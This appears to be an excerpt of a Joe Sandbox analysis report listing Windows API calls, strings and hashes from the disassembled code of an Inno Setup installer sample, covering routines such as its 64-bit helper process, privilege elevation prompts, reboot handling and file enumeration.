                                                                                                      • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                      • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                      • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                      • API String ID: 2323315520-3614243559
                                                                                                      • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                      • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                                      • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                      • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 0045862F
                                                                                                      • QueryPerformanceCounter.KERNEL32(02153858,00000000,004588C2,?,?,02153858,00000000,?,00458FBE,?,02153858,00000000), ref: 00458638
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(02153858,02153858), ref: 00458642
                                                                                                      • GetCurrentProcessId.KERNEL32(?,02153858,00000000,004588C2,?,?,02153858,00000000,?,00458FBE,?,02153858,00000000), ref: 0045864B
                                                                                                      • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                                      • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02153858,02153858), ref: 004586CF
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                                      • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                                        • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                                      • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                                        • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                      • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                      • API String ID: 770386003-3271284199
                                                                                                      • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                      • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                                      • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                      • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                                      APIs
                                                                                                        • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                        • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                        • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                        • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8), ref: 004783CC
                                                                                                        • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                        • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,02152BD8,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                                      • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                                      • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                                      • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                      • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                      • API String ID: 883996979-221126205
                                                                                                      • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                                      • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                                      • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                                      • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                                      • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1631623395-0
                                                                                                      • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                      • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                                      • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                      • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 00418393
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                                      • GetWindowRect.USER32(?), ref: 004183CC
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                                      • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                                      • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 2266315723-3772416878
                                                                                                      • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                      • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                                      • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                      • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                      • API String ID: 107509674-3733053543
                                                                                                      • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                      • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                                      • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                      • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                                      • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                                      • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                                      • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CryptVersion
                                                                                                      • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                      • API String ID: 1951258720-508647305
                                                                                                      • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                      • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                                      • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                      • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                                      • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$AttributesCloseFirstNext
                                                                                                      • String ID: isRS-$isRS-???.tmp
                                                                                                      • API String ID: 134685335-3422211394
                                                                                                      • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                      • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                                      • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                      • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                                      APIs
                                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                                      • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                                      • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                                      Strings
                                                                                                      • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                      • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                      • API String ID: 2236967946-3182603685
                                                                                                      • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                      • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                                      • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                      • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                      • API String ID: 1646373207-3712701948
                                                                                                      • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                      • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                                      • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                      • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 00417D0F
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Placement$Iconic
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 568898626-3772416878
                                                                                                      • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                      • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                                      • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                      • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                                      • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 4011626565-0
                                                                                                      • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                      • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                                      • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                      • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                                      • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 4011626565-0
                                                                                                      • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                      • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                                      • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                      • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                                      • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
